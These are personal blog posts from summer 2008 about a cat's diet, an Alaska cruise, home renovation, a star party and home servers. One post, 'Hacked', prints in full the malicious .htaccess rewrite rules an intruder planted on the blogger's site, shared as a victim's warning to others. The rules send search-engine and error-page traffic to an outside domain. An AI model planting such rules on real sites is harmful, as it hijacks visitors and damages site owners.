Bailey's Amazing Weight Loss: August 2008 Update (Friday 29th of August 2008 04:22:56 PM)
|
If you've been following Bailey's Emergency Weight Loss, here's the update for the end of August! If you don't know what's going on, check out this posting: http://blue-illusion.livejournal.com/197523.html
Monthly report: August was a great month for Bailey. He is really starting to look skinny! To us anyway. His waist is definitely defined now. He looks so happy and healthy. He got very mischievous this month! He has discovered he can jump on to counters now that he weighs less. So we have to be sure to completely clear the dishes every night at dinner. He also seems to have a fascination with our plastic container drawer. He likes to pull it open and spill everything out. He didn't quite lose enough to make it to the teens THIS month, but in the next few days, he's sure to be hitting that mark which is a major milestone! Go Bailey!!
Here's a picture from the beginning of August:

Here's his current stats!
| Date | Current Weight | Total Weight Lost | Total % Lost | Weight Lost This Month | Ounces From Goal |

The diet: Bailey is on a grain free diet consisting of 2 meals per day which each include: 1 can of Avoderm Select Cuts, and 1/8 cup of Taste of the Wild Feline. It's a total of 237 calories per day, which is what a 15lb cat should be getting.
Go, Bailey, Go!

On the Eve (Thursday 28th of August 2008 08:27:27 PM)
|
We are packed and ready for Alaska! We head out tomorrow night to Seattle, where we'll spend all day exploring the city. Sunday we board the Star Princess for a 7 night voyage to Ketchikan, Juneau, Skagway, and Victoria BC. We have a mini suite again onboard. We are very excited since we have both been wanting to see Alaska for a long time. We have some awesome excursions planned as well...ziplining, culinary tours, and visiting a dog mushing camp. It's going to rule!
While we are gone, our good friend Kara is staying at the house to watch all our furry kids. So we don't have to worry about them too much!
Last night I also was able to wrap up Truffleman's first event order, completing 60 place setting favors. Check out some of the pictures...it looks like I made zillions. And it kinds of feels like I did!

An update of sorts (Monday 25th of August 2008 10:26:53 AM)
|
Sheesh! Where have I been? I guess I haven't updated in a bit. More than normal.
It's not that there has been a lot going on to report...I just haven't.
We are very excited about our departure this Friday to Seattle for our Alaska cruise! Time has flown and we can't believe it's already here!
Victoria has been qute the traveller. She spent the weekend with her family in California, and then today she's off to St. Louis for work. So, I've been hanging out at home doing all sorts of things.
We finally snagged Dance Dance Revolution for the Wii and I am having a ball with that. I love DDR, and it's an amazingly good workout. We've also been quite good about working out with Wii Fit twice a week. I think it does help a bit. And with the change in my diet, I've actually lost about three pounds (which I am bound to gain back on the cruise).
I don't know if I mentioned about my change in diet. I went in for a physical a few weeks ago, and finally got the results. Everything was awesome except my cholesterol. I was a bit shocked since we carefully plan our meals. I think my problem may be snacking. Anyway...my good cholesterol was low, and my triglycerides were nearly in the dangerous range, so they wouldn't even measure my bad cholesterol. The doctor recommended a change in diet, and has put me in on Red Yeast Rice (ancient Chinese secret, huh?) to lower my tris. I have a retest in October. I think the change in diet and exercise has really helped.
I've always been a healthy person, rarely get sick, never had a cavity, never broken a bone...and wow, this getting older stuff really changes how your body acts. I've got to stop slacking and get moving!
I also have quite a busy week in addition to the cruise. I have a big reveal for a project I've been working on at work. I have to work late on Wednesday for a software deployment. And I have my first wedding order for Truffleman Chocolate and Candy Company to deliver on Friday! Plus getting the pets ready for our pet sitter, and packing. Wowsers! I might not get much sleep this week.

The best laid plans (Wednesday 13th of August 2008 11:12:33 AM)
|
Wow, been a few days since I have updated. Things have been very busy at home and work!
I had planned Victoria's August surprise for last Saturday. Unfortunately due to Mother Nature, things got cancelled. I had arranged for us to head downtown, go to dinner at BD Mongolian, dessert at Gelazzi, and then a candelight ride in the gondolas on Cherry Creek. The night before there was fierce flooding and Cherry Creek flooded and was quite swollen. Venice on the Creek called to let me know all gondola rides had been cancelled. Due to the short season, they close on August 23rd and so there weren't any other slots we could fit into.
Instead we ended up staying south of town and went to a new place, Grazio. It's a new Italian place that opened in Park Meadows. It was pretty good. After that we rented '21' and watched that on the pull out sofa. It's an awesome movie, go rent it! (We like Redbox 99 cent rentals!)
Victoria and I are super excited for our Alaska Cruise Trip in just 2 1/2 weeks from now. Victoria will be the traveller as she has a work and personal trip home all before the cruise!
I think that's about it for now.

Our second annual star party (Monday 4th of August 2008 09:09:42 AM)
|
Patience was definitely rewarded at our 2nd Annual Star Party and Snacking Potluck on Saturday night. Though it was very cloudy upon everyone's arrival, the night was very nice and warm to sit outside and visit with everyone.
Around 11:00-11:30, the clouds suddenly parted and we were all awed by how much it had cleared up. It was so dark and clear that we could see the Milky Way streak right across the middle of the sky very easily.
I guided the scope through many great sites: Jupiter and 4 moons, Dumbbell Nebula, Ring Nebula, M13 Globular Cluster, and the Andromeda Galaxy, among a few other things.
There was quite a line waiting to look through the scope at times. After people were tired of looking through the telescope, a number of people just laid back and looked up at the stars. We were actually treated to something else a little special, as there were a lot of shooting stars out on Saturday night as well! There was one super shooting star that seemed to burst brightly and light up the surrounding nightscape.
I had many, many questions, and I believe I was able to answer to them all. This is one of my favorite things we do during the year, and an educational event at that. I had so many people thank me and tell me what a great time they had and that it is something they don't get to do often enough. So many people said they learned a lot about the sky.
Thanks everyone for your participation and waiting out the clouds. As you saw, patience was rewarded! Many people are already asking when next year's event will be so they can sign up! Hopefully we'll have our observatory built next year and it will be even better than this year!
Special thanks to Jen who really got in to the spirit and made "Solar System Cookies." They were good, and sugary!

Party Tonight! (Saturday 2nd of August 2008 08:49:22 AM)
|
Tonight is our big second annual Star Party! I am pretty excited. It looks like the clouds might cooperate.
I spent about 3 hours out last night playing with the scope and getting familiar with the night sky since people are bound to ask questions. There are 60 people on the RSVP list! Ouch! It's going to be crazy, but fun.
I was able to image Jupiter last night. It came out somewhat good. I'll have to upload some pics of it after I get them off Victoria's laptop.

Bailey's Amazing Weight Loss: July 2008 Update (Thursday 31st of July 2008 05:43:14 PM)
|
If you've been following Bailey's Emergency Weight Loss, here's the update for the end of July! If you don't know what's going on, check out this posting: http://blue-illusion.livejournal.com/197523.html
Monthly report: July was a trying month. Bailey hit a lot of plateaus, including being the same weight for nearly a week. He looks great. He acts healthy and playful. He just couldn't seem to lose more weight. The thing with cats is, they lose the fat as fast as their body allows. Sometimes, especially as we get further in to the loss, things get slower and slower and his body just needs to retain for a few days before giving up more fat. He lapsed over his 50% towards goal, and only has 100 ounces left to lose! Never once has he not wanted to eat, which is the first signs of hipatic lipodosis, or fatty liver disease in cats, which can spell disaster. So there's proof in the diet he is on that he's had safe weight loss, and he'll be more resistant as he gets lighter to getting fatty liver disease. The losses are expected to be less and less every month now. This is only the second month he hasn't lost over a pound, but I expect that now as his weight gets lower. Maybe next month's update will include his fall into the under 20lb category.
Here's his current stats!
| Date | Current Weight | Total Weight Lost | Total % Lost | Weight Lost This Month | Ounces From Goal |
| 3-Jan-2008 | 28lb 15oz (463oz) | - | - | - | 223oz |

| 31-Mar-2008 | 25lb 3oz (403oz) | 3lb 12oz | 12.39% | 1lb 5.5oz | 163oz (26.91% towards goal) |
| 30-Apr-2008 | 24lb 4.5oz (389oz) | 4lb 10.5oz | 15.54% | 14.5oz | 149oz (33.41% towards goal) |
| 31-May-2008 | 23lb 3.5oz (372oz) | 5lb 11.5oz | 19.24% | 1lb 1oz | 132oz (41.03% towards goal) |

| 31-Jul-2008 | 21lb 3.5oz (340oz) | 7lb 11.5oz | 26.20% | 14.5oz | 100oz (55.38% towards goal) |

We can't stop ourselves! (Thursday 31st of July 2008 10:05:16 AM)
|
2 weeks ago I got an email from Princess Cruises regardling some great deals on an Alaska 4 day cruise. It's been at the top of our list for vacations, but we didn't know when we might be able to do it. And with planning to have children soon, we knew we'd either have to do it now, or wait a long time. We disregarded the email since it mostly showed (really awesome) fares for inside cabins. I spoiled us when we did our Caribbean adventure in March by getting us a mini-suite. An inside just wouldn't suffice. (Of course it was from $599 though!)
2 nights ago I got another email that balcony and minisuites had been reduced. I showed it to Victoria, then we started thinking. We didn't have any plans for the 7 day cruise sailing August 31. And the prices were insane for a 7 day minisuite to Alaska. We checked in to using frequent flyer miles, but alas, it's a holiday weekend, so no go. When Victoria looked at just booking the tickets outright, it was only $500 for both of us.
We decided to check with our workplaces and see if we could even get the time off, knowing we'd have to book immediately to get all these good fares. Sure enough, our workplaces said okay, and we went ahead and booked the cruise! It's a 7 day round trip from Seattle! We are flying in late Friday night so we can enjoy a day in Seattle on the 30th. (Any readers live in/near Seattle?!) So we'll be all touristy on Saturday, then cruise away on Sunday.
We've already booked our shore excursions, though we may not keep them all. We are currently booked for:
Ketichikan - Rainforest Canopy Zipline Tour Juneau - Taste of Juneau (Mendenhall Glacier, Brewery, Culinary Tour) Skagway - Summer Sled Dog Camp and Ride Victoria, BC - Butchart Gardens, Wine and Chocolate Tour
You can bet there will be photos and video when we return. (Argh! I need to figure out how to use the video software we have so I can get the last cruise videos up!)

Hacked (Tuesday 29th of July 2008 11:41:28 AM)
|
Well, it doesn't seem to happen often anymore, thank goodness, but I realized my web account had been hacked earlier today. I was working on some AJAX over the last month or so, and I noticed all of sudden it wasn't working anymore. It took me a few days before I started checking in to what was up. Today I finally found out what was going on...someone had hacked in to my web server account and had added a .htaccess file in the top 3 levels of directories from my root! If there was an .htaccess file, they replaced it, if there wasn't one, they added it.
Those unfamiliar with the .htaccess file...it basically controls what happens in the event someone accesses any file in the directory where that .htaccess file is located. It's actually amazing this wasn't more devastating to my site. It appears what they were doing was redirecting any traffic getting to my websites from Google, AOL, MSN, AltaVista, Ask, Yahoo, and any error pages...to a site I can't even access at work because it's blocked.
In the event I can help someone else out on the web, here is what they hacked these multiple .htaccess files into:
RemoveHandler .htm .html AddType application/x-httpd-php .php .htm .html RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://vsemutorba.com/go.php?s=hz2 [R,L] Errordocument 404 http://vsemutorba.com/go.php?s=hz2
It took a long time to clean up all those files and restore my proper .htaccess files. Luckily I had backups of them.

July Surprise (Sunday 27th of July 2008 07:48:44 PM)
|
I've been planning something fun and romantic for Victoria and I to do once a month, which I mentioned last Friday. It's was super secret and Victoria finally go her surprise on Saturday evening...I took her to the Flying W Ranch in Colorado Springs. It's an old-fashioned chuck wagon and cowboy dinner show, with an old west town to explore before dinner starts.
It's a ton of fun, and she thought it was pretty cool. The weather was perfect too. The food is served chuck wagon style and is super tasty! The entertainment is fun with cowboy antecdotes and old cowboy and western songs. If you are ever in Colorado and want to do something authentically western, check it out!

The home renovation pictures (Sunday 27th of July 2008 07:43:27 PM)
|
Well, I owe some pictures...I hear a lot of people have been following the blog to see our progress on home renovation progress.
So, here's the short of it...we wanted to change the flow of our home and gain back a lot of space in our living room that was being taken up by an awkward coat closet, so we decided to swap a window and the front door, remove the coat closet, swap the kitchen passthrough and doorway, reface the fireplace, and put in wood floors.
We are pretty far on all of this. Recently I finished all the wiring for the project, and Victoria and I hung the last of the drywall last week. Everyone has been curious to see the pictures of our effort, so here they are:
Before and after of the old front door, and new window:

Done done drywall (Thursday 24th of July 2008 09:49:10 AM)
|
Victoria and I were able to get the last few sheets of drywall hung last night in the dining room! The place looks sooooo much different than it used to. Now we can see how the door looks and where all the outlets and switches are. I did snap some photos last night before going to bed, so I'll have to upload those so we can show off a bit. I'll probably get to taping and mudding this weekend so we can finish getting it all buttoned up. Then some texture, and then paint! Wow! We are very happy with how this is coming together. Our vision is really being realized and we haven't hit many snags, thank goodness.
So I may take a night or two off from working on the house to do a little relaxing since we got so far this week. Or maybe I should just keep up with the momentum. I need to go through my drywall supplies to see what I still have and what I need to get. It's been some time since I mudded, so I don't recall what I have and don't have anymore.

Button it up (Wednesday 23rd of July 2008 11:04:06 AM)
|
Last night I managed to wrap up all the remaning electrical work for our renovation project. So now we have our outdoor outlets back (which now we have 2 on our front porch, which will be nice come holiday time). I also rehung our old porch light which we'll replace eventually. Got everything tacked down inside the walls, and got all the insulation put back.
It really looks awesome. Tonight we are planning to hang the drywall. (I say we because Victoria has been helping me out a lot with all the heavy awkward items, like big sheets of drywall.) After that, I just have to mud the drywall, then do the floors. Woohoo, we are really getting there now!
I have been working hard to get at least the drywall done before our big star party on August 2nd. There is no way I'll be able to get the floors done as we still haven't picked out the flooring we like yet. And once we do, we'll have to acclimate it at home.
I've been very excited lately about the impending star party. I hope we have clear skies. Jupiter is amazing right now, the brightest it's been in a long time. Look in your southwestern sky and you'll see a pretty bright, yellowish spot. That's Jupiter. I want to get some good pictures of it, but I haven't had time to set up the telescope, or when I am ready, it's cloudy. This is why building the observatory will be nice. Anytime I want, I can just go out for a half hour and play around since everything is set up and aligned already.
I am not sure if I have mentioned it, but this is the "Year of Surprises" for Victoria. I plan on a surprise for her every month this year. This Saturday is her July surprise. It's going to be a great time. I'll bring along the camera to snap some photos. Sometimes the surprises are just for her, and sometimes it includes both of us. It's fun to have a little something to look forward to every month, and keep the romance going.
A very rambling post...ah well!

A fun and busy weekend! (Tuesday 22nd of July 2008 11:04:29 AM)
|
What a weekend!
I got a bunch done on our home renovation. I was able to wrap up the dining/washer joint circuit wiring, and ran wire for the new outdoor outlets. I also got almost all of the siding up on the outside of the house. Wow, it really looks different now that the door is actually framed and has siding. It really feels like we are getting somewhere! Home Depot doesn't sell the cheap wood siding like we had on the house, so I had to get the James Hardie cement fiberboard trim and siding. I must say I like it, but it's very hard on my tools. I wore out: 2 drill bits, 2 Rotozip blades, and a circular saw blade, to make and hang 11 4 foot pieces! I hear this stuff is awesome and lasts forever. I wish our whole house was done in that stuff.
Tonight I'll be wrapping up the outside electricity, and hopefully getting the drywall hung in the dining room. Then I am down to mudding all the drywall and doing the wood floors. I still have a few minor things to wrap up like grouting the fireplace and such, but nothing too big.
We also joined up with lambentmoonbeam and one of Victoria's coworkers on Sunday to go see the new Batman movie in IMAX. Holy cow! I love IMAX. It's so HUGE! That was one awesome movie. I won't give any spoilers for those that haven't seen it. Heath Ledger's Joker performance was incredible. It makes me wonder what he would have gone on to do. It's a long movie, but very well done. Afterwards, we headed to Old Chicago's with lambentmoonbeam to hang out and have some grub since the movie was at lunch time.

Server Restored (Friday 18th of July 2008 09:28:01 AM)
|
I spent my evening last night getting our new server up and running. I have been unable to keep our old server (formerly my old computer) up and running for more than a day now. It streams our weather station on to the internet and serves as our print server, so it was annoying, to say the least, when it kept freezing. No matter what I tried, nothing worked to stop the freezing from occuring.
Thankfully, my parents left us their old computer when they went on the road full time. So I was able to clean that computer up last night and got the printer moved over, and the weather station appears to be running just fine there as well. I've noticed it likes to log out after about 8 hours since there are multiple profiles on the computer, so I need to find a way to stop that.
The old server will become a dev box for me at home, probably some kind of Linux type thing for doing my web development.
It's been quite a hassle to get this all to happen. With the old server freezing on startup most of the time, it's been hard to get all the files backed up from it. I lost about 3 hours worth of weather data, but that's not too bad.
This weekend I'll probably be installing the new 1TB drive in my computer. (Holy cow, I can remember when 1GB drives came out!) With our HD video camera, the files are soooo big, so I need a lot of space just to store them and back them up. Our wedding ceremony is over 5GB by itself.
We'll also be seeing the new Batman movie in IMAX! And I need to button up the rest of the walls, which means electrical work and the outside siding also needs to go up, along with the wallboard in the dining room. A lot to do before our big (~60 people) star party in 2 weeks!

I think I fixed It (Tuesday 15th of July 2008 08:39:17 AM)
|
When I moved to my current home, I had never owned an evaporative cooler before. Here in the very dry climate of Denver (15% or so humidity), evaporative coolers work really well, and cost considerably less to run (1/8-1/4 the cost). Last year my dad and I did some maintenance on the cooler and installed new pads since the old ones were pretty gross.
Not even thinking about it, we installed the pads, and put the grills back on the cooler and went about using it as normal. When my parents were at the house last summer, my mom would spray the pads from the outside because the air coming out of the cooler wasn't all that cool. This would work for a half hour or so until the pads dried back out.
This year has been pretty warm and we've been noticing the air isn't very cool coming out of the cooler, so I took the grills down last night to have a look at what was going on and see if I could get the pads to saturate somehow. What I found was actually a pretty easy fix, or at least I think it fixed the problem.
The cooler pumps water up to the top of the unit, then distributes it through feeder tubes into each of the three grills. Each of the grills has a little water trough that has slits cut in it where the water flows out and onto the pad. From there the pad saturates and the extra water falls back into the water pan and gets pumped to the top again. Easy. But that wasn't happening very well. The pads weren't actually saturating, especially on the outside next to the grill that's exposed to the outdoors.
What I found was that we had placed the pad between the trough and the grill. It was in there so tight that water couldn't come out of the slits, and if it did, it was on the backside of the pad. So, I removed the trough, removed the pad, put the trough back on, and then the pad. There's actually little teeth on the backside of the trough and they seem to be there to hold the pad up. So now water flows out the slits and falls on to the outside of the pads and saturates them.
The air seemed to be much cooler coming out last night. And in the dead of the evening changed our thermostat from 80 to 77 in about a half hour. I am still checking things out to make sure this was a good fix. We need cooler air!

Stupid web services (Tuesday 15th of July 2008 07:00:56 AM)
|
Awhile ago...gosh months ago now...I left my old web service provider because their service sucked big time. They were writing a new back end to their service and it was messing everyone's sites up and rendering the whole service unusable. They lost email. I finally moved to a new web service (which I've been fairly happy with) and just let the old service lapse. The credit card they had on file was expired, so my account couldn't be renewed.
This morning I found a charge for $190 in my bank account from them. I went in to see if my account was still active and it was. They changed my credit card expiration date to this year and tried the charge and it worked apparently. That isn't even the expiration date on my card. I put in a nasty gram to them this morning to refund the money immediately.
So if anyone is searching the internet for Ipower.com and wants a review of them: DON'T GET AN ACCOUNT THERE! They were once an awesome provider, but aren't anymore.

extra ticket (Monday 14th of July 2008 02:41:21 PM)

Busy weekend (Monday 14th of July 2008 09:14:03 AM)
|
Wow, did a lot this weekend, but still not nearly as much as I wanted to do. I think I put too much on my list of things to get accomplished.
We had a great outing to the Irish Festival on Saturday evening. We hung out with our friend Rebecca, who happens to live in the same condo complex as Victoria's place. I ended up getting a Utilikilt, which is pretty dang nice! We saw the Elders perform, and they were wonderful.
On Sunday I was gung ho and got the insulation and drywall done in the living room.
I've also gotten our entire server backed up now. We've been having a real issue with keeping the machine running and it's time for a rehaul. We use it for our print server and the weather station server. The weather station hasn't been updating online lately because the server keeps freezing! How annoying. So I'll be converting my parent's old computer into our new server, and reworking our current server into a unix dev box.

Getting Primal (Friday 11th of July 2008 06:43:58 AM)
|
We did a little something different on our beef purchase this last time. We usually get our meats at Costco because the prices are great, and the meats are very fresh. We tend to stick to things like filets, and strip. Yeah, the expensive stuff, but it's oh so tender. This time we decided to actually buy a primal cut of filet tenderloin and cut it into steaks ourselves. It was $44 but it made about 12 steaks! And we BBQed some the other night for dinner. Wow! I think for the 10 minutes of cutting, it was way worth it for the price cut and tenderness.
This weekend we're going to head to the Colorado Irish Festival. We love that fun time, and the Elders are back playing this year! Woohoo! If you want to come, let us know. We are going tomorrow (Saturday). You can buy your tickets online for a $1 less.
Happy birthday to one4k4! You are a geek, but that makes you cool :)

You'd Make A Better Window.. (Monday 7th of July 2008 06:34:35 AM)
|
Back to work after 10 days of vacation. I worked my butt off the last week and a half on the renovation project. I got quite a bit done...
Got the old front door out, and the new window in. I rewired the living room circuit, and the outdoor lights circuit. I went shopping for wood floors. I watched a bunch of movies. I went to a BBQ on the 4th at Eric's. It was a productive vacation. There's something else going on too, but I won't talk about it until it's final in a few more weeks.
Here's some pictures of the window in action...
First I took out the old front door...

Built a kickwall...

Made the rough opening a little less wide, sheathed outside, then bang...a window...

It looks awesome. We are still trying to get used to how it looks. Whenever we come up from the downstairs it looks like the front door is open since that's where the old front door was. There's a lot more light in the living room than there ever was. That's what we like about this house too is that there is so much natural light.

So, to finish up, I need to get some insulation for under the window, put up the drywall in the living room, and that bit is done. Then in the dining room it's a bit more extensive: I need to re-side the two walls outside, rewire the outside outlet circuit adding a second outside outlet, put a light up outside, rewire the joint dining room and laundry circuit and add a new dining room outlet, then drywall. After all the mudding and texture, then we can finally put down the new wood floors and that's about it!
